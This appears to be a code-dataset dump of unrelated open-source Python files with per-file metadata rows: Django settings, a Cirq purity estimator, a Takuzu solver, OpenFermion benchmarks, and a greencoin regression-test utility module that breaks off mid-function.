'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 100
}
MINI_PAGE_SIZE = 20
# Sphinx documentation.
DOCS_ROOT = os.path.join(BASE_DIR, 'docs/_build/html')
DOCS_ACCESS = 'login_required' # public/login_required/staff/superuser
# Internationalization.
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', _('English')),
('ms', _('Bahasa Malaysia')),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale'),
)
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JavaScript Internationalization (i18n)
JS_I18N_PACKAGES = (
'eclaim.masterfiles',
'eclaim.settings'
)
# Caching.
CACHE_TIMEOUT = 7 * 86400 # 7 days
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'cache'),
'TIMEOUT': CACHE_TIMEOUT
},
}
# Logging.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.abspath('eclaim.log'),
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'handlers': ['file'],
'propagate': True,
'level': 'DEBUG',
},
'ECLAIM': {
'handlers': ['file'],
'level': 'DEBUG',
},
}
}
| mit | -4,356,248,494,672,155,600 | 22.746988 | 88 | 0.627093 | false |
quantumlib/Cirq | cirq-core/cirq/experiments/purity_estimation.py | 1 | 2467 | # Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Sequence
import numpy as np
def purity_from_probabilities(
hilbert_space_dimension: int,
probabilities: Sequence[float],
) -> float:
"""Purity estimator from speckle purity benchmarking.
Estimates purity from empirical probabilities of observed bitstrings.
This estimator assumes that the circuit used in experiment is sufficiently
scrambling that its output probabilities follow the Porter-Thomas
distribution. This assumption holds for typical instances of random quantum
circuits of sufficient depth.
The state resulting from the experimental implementation of the circuit
is modeled as
ρ = p |𝜓⟩⟨𝜓| + (1 - p) I / D
where |𝜓⟩ is a pure state, I / D is the maximally mixed state, and p is
between 0 and 1. The purity of this state is given by p**2. If p = 1, then
the bitstring probabilities are modeled as being drawn from the
Porter-Thomas distribution, with probability density function given by
f(x) = (D - 1) (1 - x)**(D - 2).
The mean of this distribution is 1 / D and its variance is
(D - 1) / [D**2 (D + 1)]. In general, the variance of the distribution
    is multiplied by p**2. Therefore, the purity can be computed by dividing
the variance of the empirical probabilities by the Porter-Thomas
variance (D - 1) / [D**2 (D + 1)].
Args:
hilbert_space_dimension: Dimension of the Hilbert space on which the
quantum circuits acts.
probabilities: Empirical probabilities of bitstrings observed in
experiment.
Returns:
Estimate of the purity of the state resulting from the experimental
implementation of a quantum circuit.
"""
D = hilbert_space_dimension
porter_thomas_variance = (D - 1) / (D + 1) / D ** 2
return np.var(probabilities) / porter_thomas_variance
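# Illustrative sanity check (not part of the original module). The bitstring
# probabilities of a Haar-random pure state follow Dirichlet(1, ..., 1), i.e.
# Porter-Thomas, so the estimator should return approximately 1:
#
#   D = 2 ** 10
#   probs = numpy.random.dirichlet(numpy.ones(D))
#   purity_from_probabilities(D, probs)  # ~= 1.0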
| apache-2.0 | 758,926,273,269,246,500 | 38.532258 | 79 | 0.707874 | false |
ActiveState/code | recipes/Python/578414_Takuzu_solver/recipe-578414.py | 1 | 4263 | # Copyright 2013 Eviatar Bach, [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implementation of a Takuzu solver.
A Takuzu board consists of a square grid of binary cells. There must be an
equal number of 0s and 1s in every row and column, no duplicate rows or
columns, and no more than two of the same bit consecutive in every row and
column.
"""
from constraint_solver import pywrapcp
N = None
BOARD1 = [[N, 1, N, 0],
[N, N, 0, N],
[N, 0, N, N],
[1, 1, N, 0]]
BOARD2 = [[N, 1, N, N, N, 0],
[1, N, N, N, N, 1],
[N, N, 0, N, N, N],
[1, N, N, N, N, N],
[N, N, N, 0, N, 0],
[N, N, N, N, 1, N]]
BOARD3 = [[N, N, N, 1, N, N, N, N, N, N],
[N, 0, N, N, N, 0, N, N, N, 1],
[1, N, 1, 1, N, N, N, 1, N, N],
[N, N, N, N, N, 0, N, N, N, N],
[N, 1, N, N, N, N, N, N, 0, N],
[0, N, N, N, 0, N, N, N, 0, N],
[N, 1, N, N, N, 0, N, N, N, N],
[1, N, N, N, 1, N, 1, N, N, N],
[1, 1, N, 0, N, N, N, N, N, N],
[N, N, N, N, N, N, N, 1, N, N]]
def valid(board):
'''
Checks whether a board has no duplicate rows or columns. This is needed to
filter out invalid solutions from the constraint solver.
'''
return ((len(set(map(tuple, board))) == len(board)) and
(len(set(zip(*board))) == len(board)))
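# Illustrative behavior of valid():
#   valid([[0, 1], [1, 0]]) -> True
#   valid([[0, 1], [0, 1]]) -> False (duplicate rows)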
def solve(board):
'''
Solves a Takuzu board, with None for empty (unsolved) spaces
'''
assert len(set(map(len, board))) == 1 # all row lengths are the same
assert len(board) == len(board[0]) # width and height are the same
assert len(board) % 2 == 0 # board has even dimensions
line_sum = len(board) / 2 # the number to which all rows and columns sum
    line = range(len(board)) # row and column indices
solver = pywrapcp.Solver('takuzu')
grid = {}
for i in line:
for j in line:
grid[(i, j)] = solver.IntVar(0, 1, 'grid %i %i' % (i, j))
# initial values
for i in line:
for j in line:
if board[i][j] is not None:
solver.Add(grid[(i, j)] == board[i][j])
# no three consecutive elements in rows or columns
for i in line:
for j in range(len(board) - 2):
solver.Add(solver.SumGreaterOrEqual([grid[(i, jl)]
for jl in line[j:j + 3]], 1))
solver.Add(solver.SumLessOrEqual([grid[(i, jl)]
for jl in line[j:j + 3]], 2))
solver.Add(solver.SumGreaterOrEqual([grid[(jl, i)]
for jl in line[j:j + 3]], 1))
solver.Add(solver.SumLessOrEqual([grid[(jl, i)]
for jl in line[j:j + 3]], 2))
# rows and columns sum to half the size
for i in line:
solver.Add(solver.SumEquality([grid[(i, j)] for j in line], line_sum))
for j in line:
solver.Add(solver.SumEquality([grid[(i, j)] for i in line], line_sum))
# regroup all variables into a list
all_vars = [grid[(i, j)] for i in line for j in line]
# create search phases
vars_phase = solver.Phase(all_vars,
solver.INT_VAR_SIMPLE,
solver.INT_VALUE_SIMPLE)
# search for all solutions and remove those with duplicate rows or columns
solver.NewSearch(vars_phase)
solutions = []
while solver.NextSolution():
solutions.append([[int(grid[(i, j)].Value()) for j in line]
for i in line])
solver.EndSearch()
solutions = filter(valid, solutions)
assert len(solutions) == 1 # there should be only one solution
return solutions[0]
for row in solve(BOARD3):
print row
| mit | -8,761,855,008,896,713,000 | 31.792308 | 78 | 0.553366 | false |
quantumlib/OpenFermion | src/openfermion/testing/performance_benchmarks.py | 1 | 11534 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains tests of code performance to reveal bottlenecks."""
import time
import logging
import numpy
from openfermion.utils import commutator, Grid
from openfermion.ops import FermionOperator, QubitOperator
from openfermion.hamiltonians import jellium_model
from openfermion.transforms.opconversions import (jordan_wigner,
get_fermion_operator,
normal_ordered)
from openfermion.linalg import (jordan_wigner_sparse,
LinearQubitOperatorOptions, LinearQubitOperator,
ParallelLinearQubitOperator)
from openfermion.testing.testing_utils import random_interaction_operator
from openfermion.transforms import \
commutator_ordered_diagonal_coulomb_with_two_body_operator
def benchmark_molecular_operator_jordan_wigner(n_qubits):
"""Test speed with which molecular operators transform to qubit operators.
Args:
n_qubits: The size of the molecular operator instance. Ideally, we
would be able to transform to a qubit operator for 50 qubit
instances in less than a minute. We are way too slow right now.
Returns:
runtime: The number of seconds required to make the conversion.
"""
# Get an instance of InteractionOperator.
molecular_operator = random_interaction_operator(n_qubits)
# Convert to a qubit operator.
start = time.time()
_ = jordan_wigner(molecular_operator)
end = time.time()
# Return runtime.
runtime = end - start
return runtime
def benchmark_fermion_math_and_normal_order(n_qubits, term_length, power):
"""Benchmark both arithmetic operators and normal ordering on fermions.
The idea is we generate two random FermionTerms, A and B, each acting
on n_qubits with term_length operators. We then compute
    (A + B) ** power. This is costly; that is the first benchmark. The second
    benchmark is normal ordering whatever comes out.
Args:
n_qubits: The number of qubits on which these terms act.
term_length: The number of operators in each term.
power: Int, the exponent to which to raise sum of the two terms.
Returns:
runtime_math: The time it takes to perform (A + B) ** power
runtime_normal_order: The time it takes to perform
            normal_ordered() on the result.
"""
# Generate random operator strings.
operators_a = [(numpy.random.randint(n_qubits), numpy.random.randint(2))]
operators_b = [(numpy.random.randint(n_qubits), numpy.random.randint(2))]
for _ in range(term_length):
# Make sure the operator is not trivially zero.
operator_a = (numpy.random.randint(n_qubits), numpy.random.randint(2))
while operator_a == operators_a[-1]:
operator_a = (numpy.random.randint(n_qubits),
numpy.random.randint(2))
operators_a += [operator_a]
# Do the same for the other operator.
operator_b = (numpy.random.randint(n_qubits), numpy.random.randint(2))
while operator_b == operators_b[-1]:
operator_b = (numpy.random.randint(n_qubits),
numpy.random.randint(2))
operators_b += [operator_b]
# Initialize FermionTerms and then sum them together.
fermion_term_a = FermionOperator(tuple(operators_a),
float(numpy.random.randn()))
fermion_term_b = FermionOperator(tuple(operators_b),
float(numpy.random.randn()))
fermion_operator = fermion_term_a + fermion_term_b
# Exponentiate.
start_time = time.time()
fermion_operator **= power
runtime_math = time.time() - start_time
# Normal order.
start_time = time.time()
normal_ordered(fermion_operator)
runtime_normal_order = time.time() - start_time
# Return.
return runtime_math, runtime_normal_order
def benchmark_jordan_wigner_sparse(n_qubits):
"""Benchmark the speed at which a FermionOperator is mapped to a matrix.
Args:
n_qubits: The number of qubits in the example.
Returns:
runtime: The time in seconds that the benchmark took.
"""
# Initialize a random FermionOperator.
molecular_operator = random_interaction_operator(n_qubits)
fermion_operator = get_fermion_operator(molecular_operator)
# Map to SparseOperator class.
start_time = time.time()
_ = jordan_wigner_sparse(fermion_operator)
runtime = time.time() - start_time
return runtime
def benchmark_linear_qubit_operator(n_qubits, n_terms, processes=None):
"""Test speed with getting a linear operator from a Qubit Operator.
Args:
n_qubits: The number of qubits, implying the dimension of the operator
is 2 ** n_qubits.
n_terms: The number of terms in a qubit operator.
processes: The number of processors to use.
Returns:
runtime_operator: The time it takes to get the linear operator.
runtime_matvec: The time it takes to perform matrix multiplication.
"""
# Generates Qubit Operator with specified number of terms.
map_int_to_operator = {
0: 'X',
1: 'Y',
2: 'Z',
}
qubit_operator = QubitOperator.zero()
for _ in range(n_terms):
tuples = []
for i in range(n_qubits):
operator = numpy.random.randint(4)
# 3 is 'I', so just skip.
if operator > 2:
continue
tuples.append((i, map_int_to_operator[operator]))
if tuples:
qubit_operator += QubitOperator(tuples, 1.00)
# Gets an instance of (Parallel)LinearQubitOperator.
start = time.time()
if processes is None:
linear_operator = LinearQubitOperator(qubit_operator, n_qubits)
else:
linear_operator = ParallelLinearQubitOperator(
qubit_operator, n_qubits,
LinearQubitOperatorOptions(processes=processes))
end = time.time()
runtime_operator = end - start
vec = numpy.random.rand(2**n_qubits)
# Performs matrix multiplication.
start = time.time()
_ = linear_operator * vec
end = time.time()
runtime_matvec = end - start
return runtime_operator, runtime_matvec
def benchmark_commutator_diagonal_coulomb_operators_2D_spinless_jellium(
side_length):
"""Test speed of computing commutators using specialized functions.
Args:
side_length: The side length of the 2D jellium grid. There are
side_length ** 2 qubits, and O(side_length ** 4) terms in the
Hamiltonian.
Returns:
runtime_commutator: The time it takes to compute a commutator, after
partitioning the terms and normal ordering, using the regular
commutator function.
runtime_diagonal_commutator: The time it takes to compute the same
commutator using methods restricted to diagonal Coulomb operators.
"""
hamiltonian = normal_ordered(
jellium_model(Grid(2, side_length, 1.), plane_wave=False))
part_a = FermionOperator.zero()
part_b = FermionOperator.zero()
add_to_a_or_b = 0 # add to a if 0; add to b if 1
for term, coeff in hamiltonian.terms.items():
# Partition terms in the Hamiltonian into part_a or part_b
if add_to_a_or_b:
part_a += FermionOperator(term, coeff)
else:
part_b += FermionOperator(term, coeff)
add_to_a_or_b ^= 1
start = time.time()
_ = normal_ordered(commutator(part_a, part_b))
end = time.time()
runtime_commutator = end - start
start = time.time()
_ = commutator_ordered_diagonal_coulomb_with_two_body_operator(
part_a, part_b)
end = time.time()
runtime_diagonal_commutator = end - start
return runtime_commutator, runtime_diagonal_commutator
# Sets up each benchmark run.
def run_molecular_operator_jordan_wigner(n_qubits=18):
"""Run InteractionOperator.jordan_wigner_transform() benchmark."""
logging.info('Starting test on '
'InteractionOperator.jordan_wigner_transform()')
logging.info('n_qubits = %d.', n_qubits)
runtime = benchmark_molecular_operator_jordan_wigner(n_qubits)
logging.info(
'InteractionOperator.jordan_wigner_transform() takes %f '
'seconds.\n', runtime)
return runtime
def run_fermion_math_and_normal_order(n_qubits=20, term_length=10, power=15):
"""Run benchmark on FermionOperator math and normal-ordering."""
logging.info('Starting test on FermionOperator math and normal ordering.')
logging.info('(n_qubits, term_length, power) = (%d, %d, %d).', n_qubits,
term_length, power)
runtime_math, runtime_normal = benchmark_fermion_math_and_normal_order(
n_qubits, term_length, power)
logging.info('Math took %f seconds. Normal ordering took %f seconds.\n',
runtime_math, runtime_normal)
return runtime_math, runtime_normal
def run_jordan_wigner_sparse(n_qubits=10):
"""Run FermionOperator.jordan_wigner_sparse() benchmark."""
logging.info('Starting test on FermionOperator.jordan_wigner_sparse().')
logging.info('n_qubits = %d.', n_qubits)
runtime = benchmark_jordan_wigner_sparse(n_qubits)
logging.info('Construction of SparseOperator took %f seconds.\n', runtime)
return runtime
def run_linear_qubit_operator(n_qubits=16, n_terms=10, processes=10):
"""Run linear_qubit_operator benchmark."""
logging.info('Starting test on linear_qubit_operator().')
logging.info('(n_qubits, n_terms) = (%d, %d).', n_qubits, n_terms)
_, runtime_sequential = benchmark_linear_qubit_operator(n_qubits, n_terms)
_, runtime_parallel = benchmark_linear_qubit_operator(
n_qubits, n_terms, processes)
logging.info(
'LinearQubitOperator took %f seconds, while '
'ParallelQubitOperator took %f seconds with %d processes, '
'and ratio is %.2f.\n', runtime_sequential, runtime_parallel, processes,
runtime_sequential / runtime_parallel)
return runtime_sequential, runtime_parallel
def run_diagonal_commutator(side_length=4):
"""Run commutator_diagonal_coulomb_operators benchmark."""
logging.info(
'Starting test on '
'commutator_ordered_diagonal_coulomb_with_two_body_operator().')
runtime_commutator, runtime_diagonal_commutator = (
benchmark_commutator_diagonal_coulomb_operators_2D_spinless_jellium(
side_length=side_length))
logging.info(
'Regular commutator computation took %f seconds, while '
'commutator_ordered_diagonal_coulomb_with_two_body_operator'
' took %f seconds. Ratio is %.2f.\n', runtime_commutator,
runtime_diagonal_commutator,
runtime_commutator / runtime_diagonal_commutator)
return runtime_commutator, runtime_diagonal_commutator
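# Minimal entry-point sketch (an assumption, not part of the original file):
# wire the run_* helpers above into a command-line run using their default
# parameters.
if __name__ == '__main__':
    import logging
    logging.basicConfig(level=logging.INFO)
    run_molecular_operator_jordan_wigner()
    run_fermion_math_and_normal_order()
    run_jordan_wigner_sparse()
    run_linear_qubit_operator()
    run_diagonal_commutator()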
| apache-2.0 | -912,830,139,320,243,600 | 37.446667 | 80 | 0.661869 | false |
vbraun/oxford-strings | app/calendar_view.py | 1 | 6003 | # -*- coding: utf-8 -*-
"""
Calendaring Page Views
"""
import sys
import os
import uuid
import logging
from datetime import date, datetime, timedelta
from webapp2 import uri_for
from google.appengine.api import users
import app.config as config
from app.base_view import RequestHandler
from app.decorators import cached_property, requires_login, requires_admin
from app.event_model import Event
class CalendarAdmin(RequestHandler):
def get_events(self):
"""
Return all future events
"""
now = datetime.combine(date.today(), datetime.min.time())
return Event.query(Event.start_date >= now).order(Event.start_date).fetch(100)
def get(self):
self.cache_must_revalidate()
values = dict()
values['sync_url'] = uri_for('cron-sync')
values['full_url'] = uri_for('calendar-admin')
values['calendar_admin_url'] = self.request.uri
values['calendar'] = self.get_events()
self.render_response('calendar_admin.html', **values)
@requires_admin
def post(self):
key_id = self.request.get('key_id')
active = (self.request.get('active') == u'true')
ev = Event.get_by_id(int(key_id))
ev.active = active
ev.put()
class EventListing(RequestHandler):
def get_events(self):
"""
Return all future events
"""
now = datetime.combine(date.today(), datetime.min.time())
query = Event.query(Event.start_date >= now, Event.active == True)
return query.order(Event.start_date).fetch(100)
def get_template(self):
raise NotImplementedError
def get(self):
self.cache_must_revalidate()
values = dict()
# values['edit_url'] = uri_for('calendar-new')
values['sync_url'] = uri_for('cron-sync')
values['calendar_admin_url'] = uri_for('calendar-admin')
values['calendar'] = self.get_events()
values['abstract_intro'] = config.abstract_intro
self.render_response(self.get_template(), **values)
self.response.md5_etag()
class IcalExport(EventListing):
def _ical_time(self, dt):
import pytz
import time
dt = pytz.utc.localize(dt)
return time.strftime('%Y%m%dT%H%M%SZ', dt.timetuple())
def get(self):
from icalendar import Calendar, Event, vCalAddress, vText
cal = Calendar()
cal.add('prodid', '-//Strings Oxford Calendaring//strings.ox.ac.uk//')
cal.add('version', '2.0')
cal.add('X-WR-CALNAME', 'Strings Oxford')
for ev in self.get_events():
event = Event()
event['uid'] = vText(ev.uid)
event['location'] = vText(ev.location)
event['summary'] = ev.title
event['dtstart'] = self._ical_time(ev.start_date)
event['dtend'] = self._ical_time(ev.end_date)
desc = u'Speaker: {}\n'.format(ev.speaker)
desc += u'Location: {}\n'.format(ev.location)
desc += u'Series: {}\n'.format(ev.series)
desc += ev.description
event['description'] = vText(desc)
cal.add_component(event)
#self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Content-Type'] = 'text/calendar'
self.response.write(cal.to_ical())
class Seminars(EventListing):
def get_template(self):
return 'calendar.html'
class JuniorSeminar(EventListing):
def get_events(self):
"""
Return all future events in the string theory junior seminar series
"""
now = datetime.combine(date.today(), datetime.min.time())
query = Event.query(
Event.series == 'Strings Junior Seminar',
Event.start_date >= now,
Event.active == True)
return query.order(Event.start_date).fetch(100)
def get_template(self):
return 'junior_seminar.html'
class ThisWeek(EventListing):
def get_template(self):
return 'this_week.html'
def get_start_date(self):
"""
Return the date of the last Saturday
"""
today = date.today()
        # date.weekday() runs 0 (Monday) .. 6 (Sunday), so the week normally
        # rolls over on Monday; shifting today forward by two days makes it
        # roll over on Saturday instead.
        key_day = today + timedelta(days=2)
return today - timedelta(days=key_day.weekday())
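        # Worked example (illustrative): if today is Thu 2014-01-09
        # (weekday 3), key_day is Sat 2014-01-11 (weekday 5) and the method
        # returns 2014-01-04, the previous Saturday. On a Saturday itself,
        # key_day is the following Monday (weekday 0), so today is returned.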
def get_events(self):
last_saturday = self.get_start_date()
next_saturday = last_saturday + timedelta(weeks=1)
t0 = datetime.combine(last_saturday, datetime.min.time())
t1 = datetime.combine(next_saturday, datetime.max.time())
# allow for week-spanning events would be ideally:
# query = Event.query(Event.start_date <= t1, Event.end_date >= t0)
# but inequality queries can currently be only on one property
query = Event.query(
Event.start_date >= t0,
Event.start_date < t1,
Event.active == True)
return query.order(Event.start_date).fetch(100)
class NextWeek(ThisWeek):
def get_template(self):
return 'next_week.html'
def get_start_date(self):
"""
Return the date of the next Saturday
"""
return ThisWeek.get_start_date(self) + timedelta(weeks=1)
class ThisWeekEmail(ThisWeek):
def get_template(self):
return 'this_week_email.html'
class CalendarEdit(EventListing):
"""
TODO: do we really want to edit events ourselves?
"""
def get_event(self, key_id):
if key_id is not None:
return Event.get_by_id(int(key_id))
uid = str(uuid.uuid4())
ev = Event(uid=uid, editable=True, active=True)
ev.start_date = datetime.utcnow()
ev.end_date = datetime.utcnow()
ev.put()
return ev
def get(self, uid=None):
values = dict()
values['calendar'] = [self.get_event(uid)]
self.render_response('calendar.html', **values)
| gpl-2.0 | 2,358,411,222,917,641,000 | 28.717822 | 86 | 0.596702 | false |
gajim/python-nbxmpp | nbxmpp/modules/rsm.py | 1 | 1846 | # Copyright (C) 2020 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
from nbxmpp.namespaces import Namespace
from nbxmpp.structs import RSMData
def parse_rsm(stanza):
stanza = stanza.getTag('set', namespace=Namespace.RSM)
if stanza is None:
return None
after = stanza.getTagData('after') or None
before = stanza.getTagData('before') or None
last = stanza.getTagData('last') or None
first_index = None
first = stanza.getTagData('first') or None
if first is not None:
try:
            # getTagData() returns the text content; the 'index' attribute
            # lives on the tag object itself.
            first_index = int(stanza.getTag('first').getAttr('index'))
except Exception:
pass
try:
count = int(stanza.getTagData('count'))
except Exception:
count = None
try:
max_ = int(stanza.getTagData('max'))
except Exception:
max_ = None
try:
index = int(stanza.getTagData('index'))
except Exception:
index = None
return RSMData(after=after,
before=before,
last=last,
first=first,
first_index=first_index,
count=count,
max=max_,
index=index)
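# Illustrative input (an assumption based on XEP-0059): given
#   <set xmlns='http://jabber.org/protocol/rsm'>
#     <first index='0'>stanza-id-1</first>
#     <last>stanza-id-99</last>
#     <count>100</count>
#   </set>
# parse_rsm() yields RSMData(after=None, before=None, last='stanza-id-99',
# first='stanza-id-1', first_index=0, count=100, max=None, index=None).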
| gpl-3.0 | 1,084,813,893,102,950,700 | 29.245902 | 70 | 0.635772 | false |
GreenCoinX/greencoin | qa/rpc-tests/util.py | 1 | 12392 | # Copyright (c) 2014 The GreenCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-greencoinrpc to module search path:
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-greencoinrpc"))
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
from greencoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting XGC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def sync_blocks(rpc_connections):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(1)
def sync_mempools(rpc_connections):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(1)
greencoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "greencoin.conf"), 'w') as f:
f.write("regtest=1\n");
f.write("rpcuser=rt\n");
f.write("rpcpassword=rt\n");
f.write("port="+str(p2p_port(n))+"\n");
f.write("rpcport="+str(rpc_port(n))+"\n");
return datadir
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
greencoind and greencoin-cli must be in search path.
"""
if not os.path.isdir(os.path.join("cache", "node0")):
devnull = open("/dev/null", "w+")
# Create cache directories, run greencoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("GREENCOIND", "greencoind"), "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
greencoind_processes[i] = subprocess.Popen(args)
subprocess.check_call([ os.getenv("GREENCOINCLI", "greencoin-cli"), "-datadir="+datadir,
"-rpcwait", "getblockcount"], stdout=devnull)
devnull.close()
rpcs = []
for i in range(4):
try:
url = "http://rt:[email protected]:%d"%(rpc_port(i),)
rpcs.append(AuthServiceProxy(url))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 10 minutes apart, starting
# at 1 Jan 2014
block_time = 1388534400
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].setgenerate(True, 1)
block_time += 10*60
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_greencoinds()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in greencoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
    match = re.match('(\[[0-9a-fA-F:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
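# Examples (illustrative):
#   _rpchost_to_args('127.0.0.1:8332') -> ['-rpcconnect=127.0.0.1', '-rpcport=8332']
#   _rpchost_to_args('[::1]:8332')     -> ['-rpcconnect=::1', '-rpcport=8332']
#   _rpchost_to_args(None)             -> []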
def start_node(i, dirname, extra_args=None, rpchost=None):
"""
Start a greencoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
args = [ os.getenv("GREENCOIND", "greencoind"), "-datadir="+datadir, "-keypool=1", "-discover=0", "-rest" ]
if extra_args is not None: args.extend(extra_args)
greencoind_processes[i] = subprocess.Popen(args)
devnull = open("/dev/null", "w+")
subprocess.check_call([ os.getenv("GREENCOINCLI", "greencoin-cli"), "-datadir="+datadir] +
_rpchost_to_args(rpchost) +
["-rpcwait", "getblockcount"], stdout=devnull)
devnull.close()
url = "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
proxy = AuthServiceProxy(url)
proxy.url = url # store URL on proxy for info
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None):
"""
Start multiple greencoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
return [ start_node(i, dirname, extra_args[i], rpchost) for i in range(num_nodes) ]
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
greencoind_processes[i].wait()
del greencoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_greencoinds():
# Wait for all greencoinds to cleanly exit
for greencoind in greencoind_processes.values():
greencoind.wait()
greencoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
